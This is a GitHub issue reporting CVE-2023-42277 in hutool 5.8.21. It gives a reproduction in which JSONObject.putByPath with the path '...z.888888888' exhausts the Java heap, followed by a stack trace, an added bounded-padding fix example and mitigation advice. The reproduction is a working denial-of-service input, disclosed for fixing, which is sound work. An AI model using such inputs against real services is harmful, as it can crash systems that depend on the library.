CVE-2023-42277: `putByPath()` method throws an OutOfMemory exception · Issue #3285 · dromara/hutool
hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonObject.putByPath.
Version information
JDK version: 1.8.0_362
hutool version: 5.8.21
Problem description (including screenshots)
- Reproduction code
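```java
import cn.hutool.json.JSONObject;

public class JSONObjectTest {
    public static void main(String[] args) {
        JSONObject jSONObject = new JSONObject();
        Object value = new Object();
        // The trailing numeric path segment ends up in ListUtil.setOrPadding
        // (see the stack trace), which grows the list until the heap is exhausted.
        jSONObject.putByPath("...z.888888888", value);
    }
}
```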
Stack trace
```
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
	at java.util.Arrays.copyOf(Arrays.java:3210)
	at java.util.Arrays.copyOf(Arrays.java:3181)
	at java.util.ArrayList.grow(ArrayList.java:267)
	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
	at java.util.ArrayList.add(ArrayList.java:464)
	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:435)
	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:414)
	at cn.hutool.core.bean.BeanUtil.setFieldValue(BeanUtil.java:312)
	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:150)
	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:115)
	at cn.hutool.json.JSONObject.putByPath(JSONObject.java:325)
	at JSONObjectTest.main(JSONObjectTest.java:39)
```
- Files involved in the test (take care to redact sensitive data)
See the reproduction code.
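The stack trace above shows the numeric path segment reaching `ListUtil.setOrPadding`, where repeated `add` calls grow the backing `ArrayList` until the heap runs out. The following is an added example, not part of the issue and not hutool's source: a simplified stand-in for that padding pattern next to a bounded variant. The class name, both method names and the `MAX_PADDING` limit are assumptions made for illustration.

```java
import java.util.ArrayList;
import java.util.List;
public class BoundedPaddingExample {
    // Hypothetical cap on how many null slots a single write may add.
    static final int MAX_PADDING = 1_000;

    // Unbounded pattern (simplified stand-in, not hutool's source): pad with
    // nulls until the index exists, however large the index is.
    static <T> void setOrPaddingUnbounded(List<T> list, int index, T value) {
        if (index < list.size()) {
            list.set(index, value);
            return;
        }
        while (list.size() < index) {
            list.add(null); // index 888888888 => about 889 million add() calls
        }
        list.add(value);
    }

    // Bounded variant: refuse an index that would force excessive padding.
    static <T> void setOrPaddingBounded(List<T> list, int index, T value) {
        if (index < 0) {
            throw new IndexOutOfBoundsException("negative index: " + index);
        }
        if (index < list.size()) {
            list.set(index, value);
            return;
        }
        int padding = index - list.size();
        if (padding > MAX_PADDING) {
            throw new IllegalArgumentException("index " + index + " exceeds padding limit " + MAX_PADDING);
        }
        for (int i = 0; i < padding; i++) {
            list.add(null);
        }
        list.add(value);
    }

    public static void main(String[] args) {
        List<Object> items = new ArrayList<>();
        setOrPaddingBounded(items, 3, "ok"); // small gap: padded, then set
        System.out.println(items);
        try {
            setOrPaddingBounded(items, 888888888, "x"); // index from the report
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Callers that pass untrusted strings as bean paths can apply the same kind of limit before the path reaches the library, by rejecting numeric segments above a size the application actually needs.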